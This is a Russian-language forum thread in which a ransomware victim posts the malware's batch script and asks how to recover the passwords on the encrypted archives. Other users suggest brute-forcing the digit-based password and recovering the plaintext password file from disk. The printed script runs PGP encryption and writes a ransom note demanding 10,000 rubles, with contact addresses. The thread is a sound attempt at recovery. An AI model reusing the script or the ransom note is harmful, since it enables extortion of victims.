Помогите с расшифровкой PGP
Столкнулся с вирусом.
Он зашифровал с помощью PGP файлы.
Остались файлы pubring.pgp; randseed.bin ;
password.asc:
pa.bat:
if exist morjik goto endd
echo morjik>morjik
rem start winsor.exe
soundpass.exe
pgp.exe -ea password.txt asik
chcp 1251
for /F ~%%a in ('Date /t') Do ( for /f %%b in ('Time /t') do echo %%a - %%b>>password.asc)
echo Файлы запакованы в архивы с паролем.>>password.asc
echo Стоимость разархивации 10.000 рублей.>>password.asc
echo Для распаковки файлов пришлите два файла на e-mail: cricketgump@gmail.com >>password.asc
echo - файл который Вы сейчас читаете;>>password.asc
echo - один заархивированный файл небольшого размера;>>password.asc
echo В ответ на Ваше письмо придет оригинальный файл и инструкция по оплате.>>password.asc
echo (Оригинальный файл является подтверждением того, что возможно вернуть все данные в исходное состояние)>>password.asc
echo После оплаты придет пароль на архивы и программа, которая распакует все файлы.>>password.asc
echo Ответ на Ваше письмо придет в течение 24 часов.>>password.asc
echo Если ответ не приходит более 24 часов пришлите два файла на резервную почту: cricketgump@mail2tor.com>>password.asc
moar.exe
goto endd2
:endd
rem start winsor.exe
:endd2
Можно ли как нибудь расшифровать пароль на архивы?
комментариев: 11558 документов: 1036 редакций: 4118
вот что смог
комментариев: 1079 документов: 58 редакций: 59
Создались множество архивов....
тупо повторение 8 раз блока в восьми цифр. Осталось найти подборщик.
комментариев: 1060 документов: 16 редакций: 32
Пароль в момент запуска pgp.exe, похоже, лежит на диске в файле password.txt открытым текстом. Если он не затирается, а просто удаляется, то вытащить не должно быть большой проблемой.
Эти пароли могут быть одинаковыми?